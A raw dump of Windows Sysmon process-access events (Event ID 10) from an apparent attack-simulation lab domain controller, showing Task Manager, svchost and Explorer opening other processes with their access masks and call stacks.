10341000x8000000000000000205057Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-B991-6019-E00E-00000000A301}6408C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+1e590|C:\Windows\system32\taskmgr.exe+1a25e|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205056Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-B991-6019-E00E-00000000A301}6408C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205055Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-B991-6019-E00E-00000000A301}6408C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205054Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-B991-6019-E00E-00000000A301}6408C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205053Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-859E-6019-7105-00000000A301}5360C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205052Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-859E-6019-7105-00000000A301}5360C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205051Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-859E-6019-7105-00000000A301}5360C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205050Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-859E-6019-7105-00000000A301}5360C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205049Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-859E-6019-7005-00000000A301}4184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205048Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-859E-6019-7005-00000000A301}4184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+1e590|C:\Windows\system32\taskmgr.exe+1a25e|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205047Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-859E-6019-7005-00000000A301}4184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205046Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-859E-6019-7005-00000000A301}4184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205045Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-859E-6019-7005-00000000A301}4184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205044Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-8501-6019-5105-00000000A301}5912C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205043Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-8501-6019-5105-00000000A301}5912C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205042Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-7CBF-6019-0C00-00000000A301}588940C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-3000-00000000A301}2448C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205041Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-7CBF-6019-0C00-00000000A301}588940C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-3000-00000000A301}2448C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205040Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-7CBF-6019-0C00-00000000A301}588940C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-3000-00000000A301}2448C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205039Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-7CBF-6019-0C00-00000000A301}588940C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-3000-00000000A301}2448C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205038Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-8501-6019-5105-00000000A301}5912C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+2a948|C:\Windows\system32\taskmgr.exe+2a9b0|C:\Windows\system32\taskmgr.exe+1a471|C:\Windows\system32\taskmgr.exe+19ea8|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205037Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.832{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-8501-6019-5105-00000000A301}5912C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205036Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.832{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-8500-6019-5005-00000000A301}5804C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205035Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.832{29E67E80-84F7-6019-4105-00000000A301}36005568C:\Windows\Explorer.EXE{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\Explorer.EXE+8cb87|C:\Windows\Explorer.EXE+56261|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\Explorer.EXE+51bc9|C:\Windows\Explorer.EXE+8f763|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205034Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.832{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-8500-6019-5005-00000000A301}5804C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205033Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.832{29E67E80-7CBF-6019-0C00-00000000A301}588940C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-3000-00000000A301}2448C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205032Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.832{29E67E80-7CBF-6019-0C00-00000000A301}588940C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-3000-00000000A301}2448C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205031Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.832{29E67E80-84F7-6019-4105-00000000A301}36005568C:\Windows\Explorer.EXE{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\Explorer.EXE+5cf54|C:\Windows\Explorer.EXE+5c591|C:\Windows\Explorer.EXE+5a5a3|C:\Windows\Explorer.EXE+5983c|C:\Windows\Explorer.EXE+56de3|C:\Windows\Explorer.EXE+4bb4d|C:\Windows\Explorer.EXE+49f72|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+28e4e|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80395A558D8)|UNKNOWN(FFFFFDAC0E50E2CF)|UNKNOWN(FFFFFDAC0E4B4BA2)|UNKNOWN(FFFFFDAC0E4AF1A1)|UNKNOWN(FFFFFDAC0E4B0B6A)|UNKNOWN(FFFFFDAC0E4AEE26)|UNKNOWN(FFFFF8039576CE03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e 10341000x8000000000000000205030Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.832{29E67E80-84F7-6019-4105-00000000A301}36005568C:\Windows\Explorer.EXE{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\Explorer.EXE+5cf54|C:\Windows\Explorer.EXE+5c591|C:\Windows\Explorer.EXE+5a5a3|C:\Windows\Explorer.EXE+5983c|C:\Windows\Explorer.EXE+56de3|C:\Windows\Explorer.EXE+4bb4d|C:\Windows\Explorer.EXE+49f72|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+28e4e|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80395A558D8)|UNKNOWN(FFFFFDAC0E50E2CF)|UNKNOWN(FFFFFDAC0E4B4BA2)|UNKNOWN(FFFFFDAC0E4AF1A1)|UNKNOWN(FFFFFDAC0E4B0B6A)|UNKNOWN(FFFFFDAC0E4AEE26)|UNKNOWN(FFFFF8039576CE03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\Explorer.EXE+51aca 10341000x8000000000000000205029Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.832{29E67E80-84F7-6019-4105-00000000A301}36005568C:\Windows\Explorer.EXE{29E67E80-16F9-601B-3D38-00000000A301}4400C:\Windows\system32\taskmgr.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+5cf54|C:\Windows\Explorer.EXE+5c591|C:\Windows\Explorer.EXE+5a5a3|C:\Windows\Explorer.EXE+5983c|C:\Windows\Explorer.EXE+56de3|C:\Windows\Explorer.EXE+4bb4d|C:\Windows\Explorer.EXE+49f72|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+28e4e|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80395A558D8)|UNKNOWN(FFFFFDAC0E50E2CF)|UNKNOWN(FFFFFDAC0E4B4BA2)|UNKNOWN(FFFFFDAC0E4AF1A1)|UNKNOWN(FFFFFDAC0E4B0B6A)|UNKNOWN(FFFFFDAC0E4AEE26)|UNKNOWN(FFFFF8039576CE03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e 10341000x8000000000000000205028Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 